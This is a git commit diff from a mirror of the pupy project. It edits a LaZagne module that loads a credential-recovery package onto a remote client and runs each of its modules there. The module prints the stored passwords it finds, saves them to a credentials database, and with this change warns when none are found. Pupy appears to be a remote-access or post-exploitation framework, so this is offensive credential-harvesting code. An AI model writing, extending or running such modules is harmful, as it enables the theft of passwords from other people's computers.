mirror of https://github.com/n1nj4sec/pupy.git
Merge branch 'AlessandroZ-lazagne'
This commit is contained in:
commit
8911cc23e0
|
@ -48,14 +48,20 @@ class LaZagne(PupyModule):
|
||||||
self.client.load_package("lazagne")
|
self.client.load_package("lazagne")
|
||||||
|
|
||||||
db = Credentials()
|
db = Credentials()
|
||||||
|
|
||||||
|
passwordsFound = False
|
||||||
moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules()
|
moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules()
|
||||||
for module in moduleNames:
|
for module in moduleNames:
|
||||||
if args.verbose:
|
if args.verbose:
|
||||||
self.info("running module %s"%(str(module).split(' ',1)[0].strip('<')))
|
self.info("running module %s"%(str(module).split(' ',1)[0].strip('<')))
|
||||||
passwords = module.run(module.options['dest'].capitalize())
|
passwords = module.run(module.options['dest'].capitalize())
|
||||||
self.print_results(module.options['dest'].capitalize(), passwords, db)
|
if passwords:
|
||||||
|
passwordsFound = True
|
||||||
|
self.print_results(module.options['dest'].capitalize(), passwords, db)
|
||||||
|
|
||||||
|
if not passwordsFound:
|
||||||
|
self.warning("no passwords found !")
|
||||||
|
|
||||||
elif "Linux" in platform:
|
elif "Linux" in platform:
|
||||||
isWindows = False
|
isWindows = False
|
||||||
if "64" in self.client.desc["os_arch"]:
|
if "64" in self.client.desc["os_arch"]:
|
||||||
|
|
Loading…
Reference in New Issue